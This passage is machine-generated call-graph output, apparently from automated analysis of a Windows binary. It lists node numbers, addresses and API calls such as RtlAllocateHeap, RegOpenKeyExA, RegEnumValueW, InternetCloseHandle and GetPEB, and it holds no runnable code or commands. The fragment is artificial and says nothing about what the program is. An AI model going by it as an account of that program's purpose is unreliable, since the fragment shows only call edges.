13867 9c5b00 RtlAllocateHeap 13866->13867 13868 9c80c3 13867->13868 13869 9d7840 RtlAllocateHeap 13868->13869 13870 9c80f4 13869->13870 13871 9c5b00 RtlAllocateHeap 13870->13871 13872 9c80fb 13871->13872 13873 9c5620 RtlAllocateHeap 13872->13873 13874 9c810a 13873->13874 13875 9d7840 RtlAllocateHeap 13874->13875 13876 9c8145 13875->13876 13877 9c5b00 RtlAllocateHeap 13876->13877 13878 9c814c 13877->13878 13879 9d7840 RtlAllocateHeap 13878->13879 13880 9c8164 13879->13880 13881 9c5b00 RtlAllocateHeap 13880->13881 13882 9c816b 13881->13882 13883 9d7840 RtlAllocateHeap 13882->13883 13884 9c819c 13883->13884 13885 9c5b00 RtlAllocateHeap 13884->13885 13886 9c81a3 13885->13886 13887 9c5620 RtlAllocateHeap 13886->13887 13887->13859 13889 9c44d4 13888->13889 13890 9c4547 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13889->13890 13891 9d7f00 RtlAllocateHeap 13889->13891 13890->13505 13891->13890 13893 9c82f5 __cftof 13892->13893 13894 9d7840 RtlAllocateHeap 13893->13894 13903 9c8313 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13893->13903 13895 9c832c 13894->13895 13896 9c5b00 RtlAllocateHeap 13895->13896 13897 9c8337 13896->13897 13898 9d7840 RtlAllocateHeap 13897->13898 13899 9c8359 13898->13899 13900 9c5b00 RtlAllocateHeap 13899->13900 13901 9c8364 shared_ptr 13900->13901 13902 9c8434 GetNativeSystemInfo 13901->13902 13901->13903 13902->13903 13903->13509 13907 9d7c41 13904->13907 13908 9d7c6c 13904->13908 13905 9d7d60 13906 9d9170 RtlAllocateHeap 13905->13906 13916 9d7cd1 shared_ptr 13906->13916 13907->13573 13908->13905 13909 9d7d5b 13908->13909 13911 9d7ce7 13908->13911 13912 9d7cc0 13908->13912 13910 9c2380 RtlAllocateHeap 13909->13910 13910->13905 13914 9dd2e8 RtlAllocateHeap 13911->13914 13911->13916 13912->13909 13913 9d7ccb 13912->13913 13915 9dd2e8 RtlAllocateHeap 13913->13915 13914->13916 13915->13916 13916->13573 13918 9d75a0 RtlAllocateHeap 13917->13918 13920 9d83a0 13918->13920 13919 9d83f2 13919->13581 13920->13919 14567 9d8ba0 13920->14567 13923 9d7840 RtlAllocateHeap 13922->13923 13924 9c982e 13923->13924 13925 9c5b00 RtlAllocateHeap 13924->13925 13926 9c9837 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr __cftof 13925->13926 13926->13592 13928 9f8974 13927->13928 13929 9f86b7 3 API calls 13928->13929 13930 9f897e 13929->13930 13930->13597 13932 9d8179 13931->13932 13933 9d818d 13932->13933 13934 9d8e40 RtlAllocateHeap 13932->13934 13933->13671 13934->13933 13936 9d8088 13935->13936 13937 9d80d2 13935->13937 13936->13937 13938 9d8091 13936->13938 13939 9d80e1 13937->13939 13941 9d8e40 RtlAllocateHeap 13937->13941 13940 9d9180 RtlAllocateHeap 13938->13940 13939->13673 13942 9d809a 13940->13942 13941->13939 13942->13673 13944 9d7f00 RtlAllocateHeap 13943->13944 13945 9c4993 13944->13945 13946 9d7f00 RtlAllocateHeap 13945->13946 13947 9c49ac 13946->13947 14579 9c4590 13947->14579 13949 9c4a39 shared_ptr 13949->13728 13951 9d76a4 shared_ptr 13950->13951 13953 9d75bb 13950->13953 13951->13734 13952 9d763b 13952->13951 13954 9d9170 RtlAllocateHeap 13952->13954 13953->13951 13953->13952 13956 9d7651 13953->13956 13958 9d762a 13953->13958 13955 9d7736 13954->13955 13957 9c2380 RtlAllocateHeap 13955->13957 13956->13952 13961 9dd2e8 RtlAllocateHeap 13956->13961 13959 9d773b 13957->13959 13958->13955 13960 9dd2e8 RtlAllocateHeap 13958->13960 13960->13952 13961->13952 13963 9d9194 13962->13963 13966 9d91a5 13963->13966 14082 9d93e0 13963->14082 13965 9d922b 13965->13789 13966->13789 13968 9d355f 13967->13968 13971 9d3d4f __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13967->13971 13969 9d7f00 RtlAllocateHeap 13968->13969 13970 9d3590 13969->13970 13972 9d4207 13970->13972 13973 9d7f00 RtlAllocateHeap 13970->13973 13971->13789 13974 9d8040 RtlAllocateHeap 13972->13974 13975 9d35df 13973->13975 13976 9d420c 13974->13976 13975->13972 13978 9d7f00 RtlAllocateHeap 13975->13978 13977 9d8040 RtlAllocateHeap 13976->13977 13982 9d380c 13977->13982 13979 9d3623 13978->13979 13979->13972 13980 9d3645 13979->13980 13981 9d7f00 RtlAllocateHeap 13980->13981 13983 9d3665 13981->13983 13984 9d8040 RtlAllocateHeap 13982->13984 13985 9d7840 RtlAllocateHeap 13983->13985 13988 9d4220 13984->13988 13986 9d3678 13985->13986 13987 9c5b00 RtlAllocateHeap 13986->13987 13990 9d3683 13987->13990 14408 9dc09c 13988->14408 13990->13976 13991 9d36cf 13990->13991 13992 9d7f00 RtlAllocateHeap 13991->13992 13994 9d36f1 shared_ptr 13992->13994 13993 9dc0dc RtlAllocateHeap 13993->13971 13994->13982 13995 9c9800 RtlAllocateHeap 13994->13995 13996 9d3752 13995->13996 13997 9d7840 RtlAllocateHeap 13996->13997 14001 9d3b62 shared_ptr 13996->14001 13998 9d3769 13997->13998 13999 9c5b00 RtlAllocateHeap 13998->13999 14000 9d3774 13999->14000 14002 9d7f00 RtlAllocateHeap 14000->14002 14001->13971 14001->13993 14003 9d37bc shared_ptr 14002->14003 14003->13982 14004 9d389d 14003->14004 14054 9d3997 shared_ptr __dosmaperr 14003->14054 14005 9d7f00 RtlAllocateHeap 14004->14005 14006 9d38ba 14005->14006 14260 9cac70 14006->14260 14007 9f8959 3 API calls 14009 9d3a5a 14007->14009 14009->13988 14010 9d3a69 14009->14010 14010->14001 14011 9d3b6d 14010->14011 14012 9d3d54 14010->14012 14013 9d3a82 14010->14013 14014 9d3e22 14010->14014 14019 9d7f00 RtlAllocateHeap 14011->14019 14017 9d7f00 RtlAllocateHeap 14012->14017 14016 9d7f00 RtlAllocateHeap 14013->14016 14020 9d7840 RtlAllocateHeap 14014->14020 14015 9d7840 RtlAllocateHeap 14018 9d3976 14015->14018 14022 9d3aaa 14016->14022 14023 9d3d7c 14017->14023 14024 9d7840 RtlAllocateHeap 14018->14024 14025 9d3b95 14019->14025 14026 9d3e36 14020->14026 14021 9d38c5 shared_ptr 14021->13988 14021->14015 14027 9d7840 RtlAllocateHeap 14022->14027 14028 9d7840 RtlAllocateHeap 14023->14028 14029 9d3988 14024->14029 14030 9d7840 RtlAllocateHeap 14025->14030 14031 9d7840 RtlAllocateHeap 14026->14031 14032 9d3ac8 14027->14032 14033 9d3d9a 14028->14033 14034 9c4940 RtlAllocateHeap 14029->14034 14035 9d3bb3 14030->14035 14036 9d3e4e 14031->14036 14037 9c5b00 RtlAllocateHeap 14032->14037 14038 9c5b00 RtlAllocateHeap 14033->14038 14034->14054 14039 9c5b00 RtlAllocateHeap 14035->14039 14040 9d7840 RtlAllocateHeap 14036->14040 14041 9d3acf 14037->14041 14042 9d3da1 14038->14042 14043 9d3bba 14039->14043 14044 9d3e66 14040->14044 14047 9d7840 RtlAllocateHeap 14041->14047 14048 9d7840 RtlAllocateHeap 14042->14048 14045 9d7840 RtlAllocateHeap 14043->14045 14046 9d7840 RtlAllocateHeap 14044->14046 14050 9d3bcf 14045->14050 14051 9d3e78 14046->14051 14052 9d3ae7 14047->14052 14049 9d3db9 14048->14049 14053 9d7840 RtlAllocateHeap 14049->14053 14055 9d7840 RtlAllocateHeap 14050->14055 14271 9d2df0 14051->14271 14057 9d7840 RtlAllocateHeap 14052->14057 14058 9d3dd1 14053->14058 14054->13988 14054->14007 14059 9d3be7 14055->14059 14060 9d3aff 14057->14060 14061 9d7840 RtlAllocateHeap 14058->14061 14062 9d7840 RtlAllocateHeap 14059->14062 14063 9d7840 RtlAllocateHeap 14060->14063 14064 9d3de9 14061->14064 14065 9d3bff 14062->14065 14066 9d3b17 14063->14066 14068 9d7840 RtlAllocateHeap 14064->14068 14069 9d7840 RtlAllocateHeap 14065->14069 14067 9d7840 RtlAllocateHeap 14066->14067 14070 9d3b2f 14067->14070 14071 9d3e01 14068->14071 14072 9d3c17 14069->14072 14073 9d7840 RtlAllocateHeap 14070->14073 14074 9d7840 RtlAllocateHeap 14071->14074 14075 9d7840 RtlAllocateHeap 14072->14075 14076 9d3b47 14073->14076 14074->14076 14077 9d3c29 14075->14077 14079 9d7840 RtlAllocateHeap 14076->14079 14108 9d1da0 14077->14108 14080 9d3b59 14079->14080 14094 9d07c0 14080->14094 14083 9d9519 14082->14083 14084 9d940b 14082->14084 14085 9d9170 RtlAllocateHeap 14083->14085 14088 9d9452 14084->14088 14090 9d9479 14084->14090 14086 9d951e 14085->14086 14087 9c2380 RtlAllocateHeap 14086->14087 14093 9d9463 shared_ptr 14087->14093 14088->14086 14089 9d945d 14088->14089 14092 9dd2e8 RtlAllocateHeap 14089->14092 14091 9dd2e8 RtlAllocateHeap 14090->14091 14090->14093 14091->14093 14092->14093 14093->13965 14095 9d0840 14094->14095 14096 9d7840 RtlAllocateHeap 14095->14096 14097 9d0867 14096->14097 14098 9c5b00 RtlAllocateHeap 14097->14098 14099 9d086e 14098->14099 14100 9d7840 RtlAllocateHeap 14099->14100 14101 9d0884 14100->14101 14102 9d7840 RtlAllocateHeap 14101->14102 14103 9d089c 14102->14103 14104 9d7840 RtlAllocateHeap 14103->14104 14105 9d08b4 14104->14105 14106 9d7840 RtlAllocateHeap 14105->14106 14107 9d11c0 14106->14107 14109 9d7f00 RtlAllocateHeap 14108->14109 14110 9d1e3b 14109->14110 14111 9d1eb8 14110->14111 14112 9d1e48 14110->14112 14114 9d7f00 RtlAllocateHeap 14111->14114 14113 9d7840 RtlAllocateHeap 14112->14113 14115 9d1e62 14113->14115 14119 9d1ef7 shared_ptr 14114->14119 14116 9c5b00 RtlAllocateHeap 14115->14116 14117 9d1e69 14116->14117 14118 9d7840 RtlAllocateHeap 14117->14118 14121 9d1e7f 14118->14121 14120 9d2011 14119->14120 14123 9d1f8f 14119->14123 14124 9d2da5 14119->14124 14150 9d2906 shared_ptr 14119->14150 14122 9d7840 RtlAllocateHeap 14120->14122 14125 9d7840 RtlAllocateHeap 14121->14125 14127 9d2020 14122->14127 14128 9d7f00 RtlAllocateHeap 14123->14128 14126 9d8040 RtlAllocateHeap 14124->14126 14129 9d1e97 14125->14129 14130 9d2daa 14126->14130 14131 9c5b00 RtlAllocateHeap 14127->14131 14139 9d1fb3 shared_ptr 14128->14139 14132 9d7840 RtlAllocateHeap 14129->14132 14133 9d8040 RtlAllocateHeap 14130->14133 14141 9d202b 14131->14141 14134 9d1eaf 14132->14134 14142 9d2daf 14133->14142 14138 9d7840 RtlAllocateHeap 14134->14138 14135 9dc09c std::_Xinvalid_argument RtlAllocateHeap 14137 9d2dd2 14135->14137 14136 9d7f00 RtlAllocateHeap 14136->14120 14140 9dc0dc RtlAllocateHeap 14137->14140 14138->14150 14139->14136 14139->14150 14141->14130 14143 9d2082 14141->14143 14145 9dc09c std::_Xinvalid_argument RtlAllocateHeap 14142->14145 14144 9d7f00 RtlAllocateHeap 14143->14144 14147 9d20a7 shared_ptr 14144->14147 14145->14150 14146 9d7840 RtlAllocateHeap 14148 9d2112 14146->14148 14147->14142 14147->14146 14149 9c5b00 RtlAllocateHeap 14148->14149 14151 9d211d 14149->14151 14150->14135 14153 9d2d80 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14150->14153 14152 9d7f00 RtlAllocateHeap 14151->14152 14154 9d2184 shared_ptr __dosmaperr 14152->14154 14153->14001 14154->14142 14155 9f8959 3 API calls 14154->14155 14156 9d2235 14155->14156 14156->14142 14157 9d2244 14156->14157 14157->14137 14158 9d225d 14157->14158 14159 9d253b 14157->14159 14160 9d238a 14157->14160 14161 9d2487 14157->14161 14203 9d22b2 shared_ptr 14157->14203 14163 9d7840 RtlAllocateHeap 14158->14163 14165 9d7840 RtlAllocateHeap 14159->14165 14164 9d7840 RtlAllocateHeap 14160->14164 14166 9d7840 RtlAllocateHeap 14161->14166 14162 9d7840 RtlAllocateHeap 14167 9d2610 14162->14167 14168 9d2274 14163->14168 14169 9d23a1 14164->14169 14170 9d2552 14165->14170 14171 9d249e 14166->14171 14172 9d7840 RtlAllocateHeap 14167->14172 14173 9d7840 RtlAllocateHeap 14168->14173 14174 9d7840 RtlAllocateHeap 14169->14174 14175 9d7840 RtlAllocateHeap 14170->14175 14176 9d7840 RtlAllocateHeap 14171->14176 14186 9d2622 14172->14186 14177 9d228c 14173->14177 14178 9d23b9 14174->14178 14179 9d256a 14175->14179 14180 9d24b6 14176->14180 14181 9d7840 RtlAllocateHeap 14177->14181 14182 9d7840 RtlAllocateHeap 14178->14182 14183 9d7840 RtlAllocateHeap 14179->14183 14184 9d7840 RtlAllocateHeap 14180->14184 14187 9d22a4 14181->14187 14195 9d23d1 14182->14195 14188 9d2582 14183->14188 14185 9d24ce 14184->14185 14465 9c8f40 14185->14465 14192 9d2a53 14186->14192 14194 9f66c7 3 API calls 14186->14194 14455 9c8c40 14187->14455 14475 9c8dc0 14188->14475 14193 9d7840 RtlAllocateHeap 14192->14193 14196 9d2a6d 14193->14196 14197 9d265b 14194->14197 14198 9d7f00 RtlAllocateHeap 14195->14198 14199 9c5b00 RtlAllocateHeap 14196->14199 14200 9d7840 RtlAllocateHeap 14197->14200 14198->14203 14201 9d2a74 14199->14201 14206 9d2670 shared_ptr __dosmaperr 14200->14206 14202 9d7840 RtlAllocateHeap 14201->14202 14204 9d2a8a 14202->14204 14203->14150 14203->14162 14205 9d7840 RtlAllocateHeap 14204->14205 14207 9d2aa2 14205->14207 14206->14150 14209 9f8959 3 API calls 14206->14209 14208 9d7840 RtlAllocateHeap 14207->14208 14208->14134 14210 9d2729 14209->14210 14210->14137 14210->14150 14210->14192 14211 9d2751 14210->14211 14212 9d7840 RtlAllocateHeap 14211->14212 14213 9d2768 14212->14213 14214 9d7840 RtlAllocateHeap 14213->14214 14215 9d277d 14214->14215 14411 9c7760 14215->14411 14217 9d2786 14218 9d29f6 14217->14218 14219 9d27a1 14217->14219 14220 9d7840 RtlAllocateHeap 14218->14220 14221 9d7840 RtlAllocateHeap 14219->14221 14223 9d2a00 14220->14223 14222 9d27ab 14221->14222 14224 9c5b00 RtlAllocateHeap 14222->14224 14225 9c5b00 RtlAllocateHeap 14223->14225 14226 9d27b2 14224->14226 14227 9d2a07 14225->14227 14228 9d7840 RtlAllocateHeap 14226->14228 14229 9d7840 RtlAllocateHeap 14227->14229 14230 9d27c8 14228->14230 14231 9d2a1d 14229->14231 14232 9d7840 RtlAllocateHeap 14230->14232 14233 9d7840 RtlAllocateHeap 14231->14233 14234 9d27e0 14232->14234 14235 9d2a35 14233->14235 14236 9d7840 RtlAllocateHeap 14234->14236 14237 9d7840 RtlAllocateHeap 14235->14237 14238 9d27f8 14236->14238 14237->14134 14239 9d7840 RtlAllocateHeap 14238->14239 14240 9d280a 14239->14240 14240->14150 14241 9d7840 RtlAllocateHeap 14240->14241 14242 9d2874 14241->14242 14243 9c5b00 RtlAllocateHeap 14242->14243 14244 9d287f 14243->14244 14245 9d8160 RtlAllocateHeap 14244->14245 14246 9d2893 14245->14246 14424 9d84e0 14246->14424 14248 9d28a7 14249 9d8160 RtlAllocateHeap 14248->14249 14250 9d28b7 14249->14250 14251 9d7840 RtlAllocateHeap 14250->14251 14252 9d28d7 14251->14252 14428 9c8890 14252->14428 14254 9d28de 14255 9d7840 RtlAllocateHeap 14254->14255 14256 9d28f3 14255->14256 14257 9c5b00 RtlAllocateHeap 14256->14257 14258 9d28fa 14257->14258 14436 9c5dd0 14258->14436 14262 9cadc0 14260->14262 14261 9cade6 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14261->14021 14262->14261 14263 9c44b0 RtlAllocateHeap 14262->14263 14264 9caeab __cftof 14263->14264 14512 9c54e0 14264->14512 14266 9caf4e 14267 9d7f00 RtlAllocateHeap 14266->14267 14268 9caf8b 14267->14268 14269 9d8040 RtlAllocateHeap 14268->14269 14270 9cb08c 14269->14270 14272 9d2e95 14271->14272 14273 9d7840 RtlAllocateHeap 14272->14273 14274 9d2ea1 14273->14274 14275 9c5b00 RtlAllocateHeap 14274->14275 14276 9d2eac 14275->14276 14277 9d7f00 RtlAllocateHeap 14276->14277 14278 9d2eef 14277->14278 14279 9d7840 RtlAllocateHeap 14278->14279 14280 9d323c __cftof 14279->14280 14281 9d32c2 InternetCloseHandle InternetCloseHandle 14280->14281 14282 9d3301 14281->14282 14283 9d7840 RtlAllocateHeap 14282->14283 14284 9d3394 14283->14284 14285 9c5b00 RtlAllocateHeap 14284->14285 14286 9d339b 14285->14286 14287 9d7840 RtlAllocateHeap 14286->14287 14288 9d33ae 14287->14288 14289 9d7840 RtlAllocateHeap 14288->14289 14290 9d33c3 14289->14290 14291 9d7840 RtlAllocateHeap 14290->14291 14292 9d33d8 14291->14292 14293 9d7840 RtlAllocateHeap 14292->14293 14294 9d33ea 14293->14294 14295 9d7f00 RtlAllocateHeap 14294->14295 14298 9d34ea __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14294->14298 14296 9d3590 14295->14296 14297 9d4207 14296->14297 14299 9d7f00 RtlAllocateHeap 14296->14299 14300 9d8040 RtlAllocateHeap 14297->14300 14298->14001 14301 9d35df 14299->14301 14302 9d420c 14300->14302 14301->14297 14304 9d7f00 RtlAllocateHeap 14301->14304 14303 9d8040 RtlAllocateHeap 14302->14303 14308 9d380c 14303->14308 14305 9d3623 14304->14305 14305->14297 14306 9d3645 14305->14306 14307 9d7f00 RtlAllocateHeap 14306->14307 14309 9d3665 14307->14309 14310 9d8040 RtlAllocateHeap 14308->14310 14311 9d7840 RtlAllocateHeap 14309->14311 14314 9d4220 14310->14314 14312 9d3678 14311->14312 14313 9c5b00 RtlAllocateHeap 14312->14313 14316 9d3683 14313->14316 14315 9dc09c std::_Xinvalid_argument RtlAllocateHeap 14314->14315 14327 9d3b62 shared_ptr 14315->14327 14316->14302 14317 9d36cf 14316->14317 14318 9d7f00 RtlAllocateHeap 14317->14318 14321 9d36f1 shared_ptr 14318->14321 14319 9dc0dc RtlAllocateHeap 14319->14298 14320 9c9800 RtlAllocateHeap 14322 9d3752 14320->14322 14321->14308 14321->14320 14323 9d7840 RtlAllocateHeap 14322->14323 14322->14327 14324 9d3769 14323->14324 14325 9c5b00 RtlAllocateHeap 14324->14325 14326 9d3774 14325->14326 14328 9d7f00 RtlAllocateHeap 14326->14328 14327->14298 14327->14319 14329 9d37bc shared_ptr 14328->14329 14329->14308 14330 9d389d 14329->14330 14380 9d3997 shared_ptr __dosmaperr 14329->14380 14331 9d7f00 RtlAllocateHeap 14330->14331 14332 9d38ba 14331->14332 14334 9cac70 4 API calls 14332->14334 14333 9f8959 3 API calls 14335 9d3a5a 14333->14335 14347 9d38c5 shared_ptr 14334->14347 14335->14314 14336 9d3a69 14335->14336 14336->14327 14337 9d3b6d 14336->14337 14338 9d3d54 14336->14338 14339 9d3a82 14336->14339 14340 9d3e22 14336->14340 14345 9d7f00 RtlAllocateHeap 14337->14345 14343 9d7f00 RtlAllocateHeap 14338->14343 14342 9d7f00 RtlAllocateHeap 14339->14342 14346 9d7840 RtlAllocateHeap 14340->14346 14341 9d7840 RtlAllocateHeap 14344 9d3976 14341->14344 14348 9d3aaa 14342->14348 14349 9d3d7c 14343->14349 14350 9d7840 RtlAllocateHeap 14344->14350 14351 9d3b95 14345->14351 14352 9d3e36 14346->14352 14347->14314 14347->14341 14353 9d7840 RtlAllocateHeap 14348->14353 14354 9d7840 RtlAllocateHeap 14349->14354 14355 9d3988 14350->14355 14356 9d7840 RtlAllocateHeap 14351->14356 14357 9d7840 RtlAllocateHeap 14352->14357 14358 9d3ac8 14353->14358 14359 9d3d9a 14354->14359 14360 9c4940 RtlAllocateHeap 14355->14360 14361 9d3bb3 14356->14361 14362 9d3e4e 14357->14362 14363 9c5b00 RtlAllocateHeap 14358->14363 14364 9c5b00 RtlAllocateHeap 14359->14364 14360->14380 14365 9c5b00 RtlAllocateHeap 14361->14365 14366 9d7840 RtlAllocateHeap 14362->14366 14367 9d3acf 14363->14367 14368 9d3da1 14364->14368 14369 9d3bba 14365->14369 14370 9d3e66 14366->14370 14373 9d7840 RtlAllocateHeap 14367->14373 14374 9d7840 RtlAllocateHeap 14368->14374 14371 9d7840 RtlAllocateHeap 14369->14371 14372 9d7840 RtlAllocateHeap 14370->14372 14376 9d3bcf 14371->14376 14377 9d3e78 14372->14377 14378 9d3ae7 14373->14378 14375 9d3db9 14374->14375 14379 9d7840 RtlAllocateHeap 14375->14379 14381 9d7840 RtlAllocateHeap 14376->14381 14382 9d2df0 6 API calls 14377->14382 14383 9d7840 RtlAllocateHeap 14378->14383 14384 9d3dd1 14379->14384 14380->14314 14380->14333 14385 9d3be7 14381->14385 14382->14327 14386 9d3aff 14383->14386 14387 9d7840 RtlAllocateHeap 14384->14387 14388 9d7840 RtlAllocateHeap 14385->14388 14389 9d7840 RtlAllocateHeap 14386->14389 14390 9d3de9 14387->14390 14391 9d3bff 14388->14391 14392 9d3b17 14389->14392 14394 9d7840 RtlAllocateHeap 14390->14394 14395 9d7840 RtlAllocateHeap 14391->14395 14393 9d7840 RtlAllocateHeap 14392->14393 14396 9d3b2f 14393->14396 14397 9d3e01 14394->14397 14398 9d3c17 14395->14398 14399 9d7840 RtlAllocateHeap 14396->14399 14400 9d7840 RtlAllocateHeap 14397->14400 14401 9d7840 RtlAllocateHeap 14398->14401 14402 9d3b47 14399->14402 14400->14402 14403 9d3c29 14401->14403 14405 9d7840 RtlAllocateHeap 14402->14405 14404 9d1da0 6 API calls 14403->14404 14404->14327 14406 9d3b59 14405->14406 14407 9d07c0 RtlAllocateHeap 14406->14407 14407->14327 14539 9dbfec 14408->14539 14410 9dc0ad std::_Throw_future_error 14485 9d8580 14411->14485 14413 9c77a1 14414 9d8160 RtlAllocateHeap 14413->14414 14416 9c77b3 shared_ptr 14414->14416 14415 9d7840 RtlAllocateHeap 14417 9c7811 14415->14417 14416->14415 14423 9c7856 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14416->14423 14418 9d7840 RtlAllocateHeap 14417->14418 14419 9c782c 14418->14419 14420 9c5b00 RtlAllocateHeap 14419->14420 14421 9c7833 14420->14421 14422 9d7f00 RtlAllocateHeap 14421->14422 14422->14423 14423->14217 14425 9d84f6 14424->14425 14425->14425 14426 9d8e40 RtlAllocateHeap 14425->14426 14427 9d850b 14425->14427 14426->14427 14427->14248 14432 9c88e8 shared_ptr 14428->14432 14435 9c89fa 14428->14435 14429 9d7840 RtlAllocateHeap 14429->14432 14430 9c5b00 RtlAllocateHeap 14430->14432 14431 9c8a30 14434 9d8040 RtlAllocateHeap 14431->14434 14432->14429 14432->14430 14432->14431 14433 9d7f00 RtlAllocateHeap 14432->14433 14432->14435 14433->14432 14434->14435 14435->14254 14438 9c5e08 14436->14438 14437 9c5eee __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14437->14150 14438->14437 14439 9d7f00 RtlAllocateHeap 14438->14439 14440 9c5f79 14439->14440 14441 9d7f00 RtlAllocateHeap 14440->14441 14442 9c5fad 14441->14442 14443 9d7f00 RtlAllocateHeap 14442->14443 14444 9c5fde 14443->14444 14445 9d7f00 RtlAllocateHeap 14444->14445 14446 9c600f 14445->14446 14447 9d7f00 RtlAllocateHeap 14446->14447 14448 9c6040 RegOpenKeyExA 14447->14448 14449 9c643a __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14448->14449 14454 9c6093 __cftof 14448->14454 14449->14150 14450 9c6133 RegEnumValueW 14450->14454 14451 9d7c20 RtlAllocateHeap 14451->14454 14452 9d8350 RtlAllocateHeap 14452->14454 14453 9d7840 RtlAllocateHeap 14453->14454 14454->14449 14454->14450 14454->14451 14454->14452 14454->14453 14456 9c8c90 14455->14456 14457 9d7840 RtlAllocateHeap 14456->14457 14458 9c8c9f 14457->14458 14459 9c5b00 RtlAllocateHeap 14458->14459 14460 9c8caa 14459->14460 14461 9d7f00 RtlAllocateHeap 14460->14461 14462 9c8cfc 14461->14462 14463 9d8060 RtlAllocateHeap 14462->14463 14464 9c8d0e __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14463->14464 14464->14203 14466 9c8f90 14465->14466 14467 9d7840 RtlAllocateHeap 14466->14467 14468 9c8f9f 14467->14468 14469 9c5b00 RtlAllocateHeap 14468->14469 14470 9c8faa 14469->14470 14471 9d7f00 RtlAllocateHeap 14470->14471 14472 9c8ffc 14471->14472 14473 9d8060 RtlAllocateHeap 14472->14473 14474 9c900e __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14473->14474 14474->14203 14476 9c8e10 14475->14476 14477 9d7840 RtlAllocateHeap 14476->14477 14478 9c8e1f 14477->14478 14479 9c5b00 RtlAllocateHeap 14478->14479 14480 9c8e2a 14479->14480 14481 9d7f00 RtlAllocateHeap 14480->14481 14482 9c8e7c 14481->14482 14483 9d8060 RtlAllocateHeap 14482->14483 14484 9c8e8e __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14483->14484 14484->14203 14486 9d85e0 14485->14486 14486->14486 14487 9d75a0 RtlAllocateHeap 14486->14487 14488 9d85f9 14487->14488 14490 9d8614 14488->14490 14494 9d8e40 14488->14494 14491 9d8e40 RtlAllocateHeap 14490->14491 14493 9d8669 14490->14493 14492 9d86b1 14491->14492 14492->14413 14493->14413 14495 9d8f8e 14494->14495 14496 9d8e6b 14494->14496 14497 9d9170 RtlAllocateHeap 14495->14497 14500 9d8edc 14496->14500 14501 9d8eb2 14496->14501 14498 9d8f93 14497->14498 14499 9c2380 RtlAllocateHeap 14498->14499 14505 9d8ec3 14499->14505 14504 9dd2e8 RtlAllocateHeap 14500->14504 14500->14505 14501->14498 14502 9d8ebd 14501->14502 14503 9dd2e8 RtlAllocateHeap 14502->14503 14503->14505 14504->14505 14506 9d8fb8 14505->14506 14508 9d8f4c shared_ptr 14505->14508 14509 9c2380 std::_Throw_future_error 14505->14509 14507 9dd2e8 RtlAllocateHeap 14506->14507 14507->14508 14508->14490 14510 9f37bc ___std_exception_copy RtlAllocateHeap 14509->14510 14511 9c23c3 14510->14511 14511->14490 14513 9c5500 14512->14513 14515 9c5600 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14513->14515 14516 9c21c0 14513->14516 14515->14266 14519 9c2180 14516->14519 14520 9c2196 14519->14520 14523 9f8647 14520->14523 14526 9f7436 14523->14526 14525 9c21a4 14525->14513 14527 9f745e __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z __dosmaperr ___std_exception_copy 14526->14527 14528 9f7476 14526->14528 14527->14525 14528->14527 14529 9f681a __fassign 3 API calls 14528->14529 14530 9f748e 14529->14530 14532 9f79f1 14530->14532 14534 9f7a02 14532->14534 14533 9f7a11 __dosmaperr ___std_exception_copy 14533->14527 14534->14533 14535 9f7bef GetPEB GetPEB RtlAllocateHeap 14534->14535 14536 9f7c15 GetPEB GetPEB RtlAllocateHeap 14534->14536 14537 9f7d63 GetPEB GetPEB RtlAllocateHeap 14534->14537 14538 9f7f95 GetPEB GetPEB RtlAllocateHeap 14534->14538 14535->14534 14536->14534 14537->14534 14538->14534 14540 9c21e0 std::invalid_argument::invalid_argument RtlAllocateHeap 14539->14540 14541 9dbffe 14540->14541 14541->14410 14545 9f86b7 14542->14545 14544 9f8a7f 14544->13859 14546 9f86c9 14545->14546 14547 9f681a __fassign 3 API calls 14546->14547 14550 9f86de __dosmaperr ___std_exception_copy 14546->14550 14549 9f870e 14547->14549 14549->14550 14551 9f8905 14549->14551 14550->14544 14552 9f8942 14551->14552 14553 9f8912 14551->14553 14554 9fd2c9 2 API calls 14552->14554 14556 9f8921 __fassign 14553->14556 14557 9fd2ed 14553->14557 14554->14556 14556->14549 14558 9f681a __fassign 3 API calls 14557->14558 14559 9fd30a 14558->14559 14561 9fd31a __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14559->14561 14562 9ff05f 14559->14562 14561->14556 14563 9f681a __fassign 3 API calls 14562->14563 14564 9ff07f __fassign 14563->14564 14565 9faeeb __fassign RtlAllocateHeap 14564->14565 14566 9ff0d2 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z __cftof __fassign __freea 14564->14566 14565->14566 14566->14561 14568 9d8cc9 14567->14568 14569 9d8bc3 14567->14569 14570 9d9170 RtlAllocateHeap 14568->14570 14573 9d8c2f 14569->14573 14574 9d8c05 14569->14574 14571 9d8cce 14570->14571 14572 9c2380 RtlAllocateHeap 14571->14572 14578 9d8c16 shared_ptr 14572->14578 14576 9dd2e8 RtlAllocateHeap 14573->14576 14573->14578 14574->14571 14575 9d8c10 14574->14575 14577 9dd2e8 RtlAllocateHeap 14575->14577 14576->14578 14577->14578 14578->13920 14580 9d7f00 RtlAllocateHeap 14579->14580 14587 9c4622 shared_ptr 14580->14587 14581 9c4918 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14581->13949 14582 9d7f00 RtlAllocateHeap 14586 9c4788 shared_ptr 14582->14586 14583 9d7f00 